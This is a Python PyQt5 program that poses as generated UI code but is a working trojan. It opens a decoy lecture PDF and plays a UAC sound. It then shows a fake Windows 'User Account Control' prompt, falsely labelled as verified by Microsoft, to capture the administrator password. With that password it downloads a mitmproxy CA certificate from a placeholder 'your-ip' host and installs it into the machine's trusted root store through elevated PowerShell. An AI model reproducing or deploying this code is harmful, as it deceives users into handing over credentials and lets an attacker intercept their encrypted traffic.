# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file 'pw_prompt.ui'
#
# Created by: PyQt5 UI code generator 5.15.9
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again.  Do not edit this file unless you know what you are doing.


from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtMultimedia import QSound
import sys
import requests, subprocess
from PyQt5.QtGui import QIcon
import os
import time

class Ui_MainWindow(object):
    def setupUi(self, MainWindow):
        MainWindow.setObjectName("MainWindow")
        MainWindow.setEnabled(True)
        MainWindow.setFixedSize(420, 440)
        sizePolicy = QtWidgets.QSizePolicy(
            QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed
        )
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
        MainWindow.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(8)
        MainWindow.setFont(font)
        MainWindow.setAutoFillBackground(False)
        MainWindow.setStyleSheet("")
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.label = QtWidgets.QLabel(self.centralwidget)
        self.label.setGeometry(QtCore.QRect(0, 0, 511, 131))
        font = QtGui.QFont()
        font.setFamily("Segoe UI")
        font.setPointSize(15)
        font.setBold(False)
        font.setWeight(50)
        self.label.setFont(font)
        self.label.setStyleSheet("background-color: rgb(134, 197, 216);")
        self.label.setObjectName("label")
        self.label_2 = QtWidgets.QLabel(self.centralwidget)
        self.label_2.setGeometry(QtCore.QRect(0, 130, 101, 91))
        sizePolicy = QtWidgets.QSizePolicy(
            QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed
        )
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.label_2.sizePolicy().hasHeightForWidth())
        self.label_2.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setFamily("Segoe UI")
        self.label_2.setFont(font)
        self.label_2.setStyleSheet("background-color: rgb(220, 220, 220);")
        self.label_2.setText("")
        image = sys._MEIPASS + "\Windows-defender2.svg.png"
        self.label_2.setPixmap(QtGui.QPixmap(image))
        self.label_2.setWordWrap(False)
        self.label_2.setObjectName("label_2")
        self.label_3 = QtWidgets.QLabel(self.centralwidget)
        self.label_3.setGeometry(QtCore.QRect(90, 130, 411, 91))
        font = QtGui.QFont()
        font.setFamily("Segoe UI")
        font.setPointSize(14)
        self.label_3.setFont(font)
        self.label_3.setStyleSheet("background-color: rgb(220, 220, 220);")
        self.label_3.setObjectName("label_3")
        self.label_4 = QtWidgets.QLabel(self.centralwidget)
        self.label_4.setGeometry(QtCore.QRect(0, 220, 501, 41))
        font = QtGui.QFont()
        font.setFamily("Segoe UI")
        font.setPointSize(9)
        self.label_4.setFont(font)
        self.label_4.setStyleSheet("background-color: rgb(220, 220, 220);")
        self.label_4.setObjectName("label_4")
        self.label_5 = QtWidgets.QLabel(self.centralwidget)
        self.label_5.setGeometry(QtCore.QRect(0, 260, 501, 41))
        font = QtGui.QFont()
        font.setFamily("Segoe UI")
        font.setPointSize(9)
        self.label_5.setFont(font)
        self.label_5.setStyleSheet("background-color: rgb(220, 220, 220);")
        self.label_5.setObjectName("label_5")
        self.label_6 = QtWidgets.QLabel(self.centralwidget)
        self.label_6.setGeometry(QtCore.QRect(0, 300, 501, 41))
        font = QtGui.QFont()
        font.setFamily("Segoe UI")
        font.setPointSize(9)
        self.label_6.setFont(font)
        self.label_6.setStyleSheet("background-color: rgb(220, 220, 220);")
        self.label_6.setObjectName("label_6")
        self.label_7 = QtWidgets.QLabel(self.centralwidget)
        self.label_7.setGeometry(QtCore.QRect(-6, 335, 511, 61))
        self.label_7.setStyleSheet("background-color: rgb(220, 220, 220);")
        self.label_7.setText("")
        self.label_7.setObjectName("label_7")
        self.pw_input = QtWidgets.QLineEdit(self.centralwidget)
        self.pw_input.setGeometry(QtCore.QRect(22, 350, 331, 31))
        font = QtGui.QFont()
        font.setFamily("Segoe UI")
        font.setPointSize(9)
        self.pw_input.setFont(font)
        self.pw_input.setStyleSheet("border-color: rgb(134, 197, 216);\n" "")
        self.pw_input.setEchoMode(QtWidgets.QLineEdit.Password)
        self.pw_input.setObjectName("pw_input")
        self.label_8 = QtWidgets.QLabel(self.centralwidget)
        self.label_8.setGeometry(QtCore.QRect(-6, 395, 511, 61))
        font = QtGui.QFont()
        font.setFamily("Segoe UI")
        font.setPointSize(9)
        self.label_8.setFont(font)
        self.label_8.setStyleSheet("background-color: rgb(220, 220, 220);")
        self.label_8.setText("")
        self.label_8.setObjectName("label_8")
        self.yes_btn = QtWidgets.QPushButton(self.centralwidget)
        self.yes_btn.setGeometry(QtCore.QRect(30, 400, 170, 25))
        font = QtGui.QFont()
        font.setFamily("Segoe UI")
        font.setPointSize(9)
        self.yes_btn.setFont(font)
        self.yes_btn.setStyleSheet("background-color: rgb(169, 169, 169);")
        self.yes_btn.setObjectName("yes_btn")
        self.no_btn = QtWidgets.QPushButton(self.centralwidget)
        self.no_btn.setGeometry(QtCore.QRect(210, 400, 170, 25))
        font = QtGui.QFont()
        font.setFamily("Segoe UI")
        font.setPointSize(9)
        self.no_btn.setFont(font)
        self.no_btn.setStyleSheet("background-color: rgb(169, 169, 169);")
        self.no_btn.setObjectName("no_btn")
        MainWindow.setCentralWidget(self.centralwidget)

        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "User Account Control"))
        self.label.setText(
            _translate(
                "MainWindow",
                "  Do you want to allow this app to make \n"
                "  changes to your device?",
            )
        )
        self.label_3.setText(_translate("MainWindow", "  Windows Security"))
        self.label_4.setText(
            _translate("MainWindow", "    Verified Publisher: Microsoft Windows\n" " ")
        )
        self.label_5.setText(
            _translate(
                "MainWindow", "    To continue, enter an admin username and password"
            )
        )
        self.label_6.setText(_translate("MainWindow", "     Admininstrator"))
        self.pw_input.setPlaceholderText(_translate("MainWindow", "  Password"))
        self.yes_btn.setText(_translate("MainWindow", "Yes"))
        self.no_btn.setText(_translate("MainWindow", "No"))


class MyMainWindow(QtWidgets.QMainWindow):
    def __init__(self):
        super(MyMainWindow, self).__init__()
        self.ui = Ui_MainWindow()
        self.ui.setupUi(self)
        self.ui.yes_btn.clicked.connect(self.handle_yes_btn)
        self.ui.no_btn.clicked.connect(self.handle_no_btn)
        self.password_entered = True

    def download(self, url):
        response = requests.get(url)
        file_name = url.split("/")[-1]
        with open(file_name, "wb") as my_file:
            my_file.write(response.content)

    def admin_name(self):
        text = subprocess.check_output("net user", shell=True).decode()
        lines = text.split("\n")
        if len(lines) >= 6:
            words = lines[5].split()
            if len(words) >= 1:
                first_word = words[0]
                return first_word
            else:
                pass
        else:
            pass

    def powershell_command(self, command, password):
        admin_password = password
        encoded_password = admin_password.encode("utf-16le")

        cmd = "powershell -Command \"Start-Process -FilePath powershell -ArgumentList '-Command {0}' -Verb RunAs\""
        full_command = cmd.format(command)

        process = subprocess.run(
            full_command, input=encoded_password, shell=True, capture_output=True
        )
        stdout = process.stdout.decode().strip()
        stderr = process.stderr.decode().strip()

        print("Command Output:")
        if stdout:
            print("Standard Output:")
            print(stdout)
        if stderr:
            print("Standard Error:")
            print(stderr)

    def handle_yes_btn(self):
        password = self.ui.pw_input.text()
        if len(password) > 1:
            self.close()
            file_name = "mitmproxy-ca-cert.cer"
            location = os.environ["TEMP"]
            os.chdir(location)
            full_path = os.path.join(location, file_name)
            self.download("http://your-ip/files/mitmproxy-ca-cert.cer") #ip where the certiicate will be hosted.
            if os.path.exists(full_path):
                print("SUI")
            command = (
                'Import-Certificate -FilePath "'
                + full_path
                + '" -CertStoreLocation Cert:\\LocalMachine\\Root'
            )
            self.powershell_command(command, password)
        else:
            QtWidgets.QMessageBox.critical(self, "Error", "Enter password!")
            self.password_entered = False

    def handle_no_btn(self):
        QtWidgets.QMessageBox.critical(self, "Error", "Enter password!")
        self.password_entered = False

    def closeEvent(self, event):
        self.password_entered = False
        event.accept()


if __name__ == "__main__":
    pdf = sys._MEIPASS + "\Lec 5-VPN.pdf"
    subprocess.Popen(pdf, shell=True)
    time.sleep(10)
    sound = sys._MEIPASS + r"\uac_sound.wav"
    sound = QSound(sound)
    sound.play()
    app = QtWidgets.QApplication(sys.argv)
    window = MyMainWindow()
    window.show()
    #     MainWindow = QtWidgets.QMainWindow()
    #     ui = Ui_MainWindow()
    #     ui.setupUi(MainWindow)
    #     MainWindow.show()
    sys.exit(app.exec_())
